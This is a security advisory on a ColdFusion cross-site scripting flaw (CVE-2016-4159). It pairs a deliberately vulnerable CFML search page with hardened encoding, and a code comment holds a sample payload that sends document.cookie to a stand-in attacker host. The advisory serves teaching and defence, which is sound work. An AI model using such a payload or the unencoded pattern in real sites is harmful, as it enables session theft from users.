#VU5 Cross-Site Scripting in ColdFusion


Published: 1970-01-01 | Updated: 2016-06-24

Vulnerability identifier: #VU5

Vulnerability risk: Low

CVSSv3.1: 5.3 [AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2016-4159

CWE-ID: CWE-79

Exploitation vector: Network

Exploit availability: No

Description

A cross-site scripting vulnerability was reported in ColdFusion.

The vulnerability exists due to insufficient sanitization of user-supplied input. A remote attacker can craft a malicious link or HTTP request which, when a victim follows it, executes arbitrary HTML and script code in the victim's browser in the security context of the vulnerable website.

Successful exploitation may allow an attacker to obtain information sensitive to the victim, such as session cookies, or to alter the content of the website as displayed to the victim.
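The bulletin does not identify which ColdFusion component reflects the input, so the snippet below is an added, generic illustration of CWE-79 in CFML and is not the code fixed by APSB16-22. It assumes a hypothetical page search.cfm that reflects the URL parameter q, shows the unsafe pattern first, and then the hardened form using the context-specific encoders ColdFusion 10 and later provide.

```cfml
<!--- search.cfm: added illustration of reflected XSS (CWE-79) in CFML.
      This is example code, not the component affected by APSB16-22. --->
<cfparam name="url.q" default="">

<!--- VULNERABLE: the raw query parameter is written into the response.
      A request such as
        /search.cfm?q=<script>document.location='https://attacker.example/?c='+document.cookie</script>
      is echoed verbatim and runs in the victim's browser with the site's origin. --->
<cfoutput>
<p>Results for: #url.q#</p>
<input type="text" name="q" value="#url.q#">
</cfoutput>

<!--- HARDENED: encode for the exact context the value lands in.
      One encoder does not fit all contexts: HTML body, attribute value,
      JavaScript string and URL each have their own metacharacters. --->
<cfoutput>
<p>Results for: #encodeForHTML(url.q)#</p>
<input type="text" name="q" value="#encodeForHTMLAttribute(url.q)#">
<script>var lastQuery = "#encodeForJavaScript(url.q)#";</script>
<a href="/search.cfm?q=#encodeForURL(url.q)#">Permanent link</a>
</cfoutput>
```

Two defence-in-depth settings from Application.cfc are worth pairing with output encoding: this.scriptProtect (values none, all, or a list of url, form, cgi, cookie) applies ColdFusion's built-in pattern filter to incoming scopes, and this.sessionCookie = { httpOnly: true, secure: true } (ColdFusion 10 and later) keeps the session cookie out of reach of script even if an XSS bug remains. Neither replaces the vendor update listed under Mitigation or the per-context encoding shown above; scriptProtect in particular is a pattern filter and is not a complete XSS defence.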


Mitigation

The vulnerability is fixed in the following versions of ColdFusion:

  • ColdFusion (2016 release) Update 2
  • ColdFusion 11 Update 9
  • ColdFusion 10 Update 20

Adobe recommends that ColdFusion customers update their installation using the instructions provided in the relevant technote.

Customers should also apply the security configuration settings as outlined on the ColdFusion Security page as well as review the respective Lockdown guide.

External links
http://helpx.adobe.com/security/products/coldfusion/apsb16-22.html


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware that exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

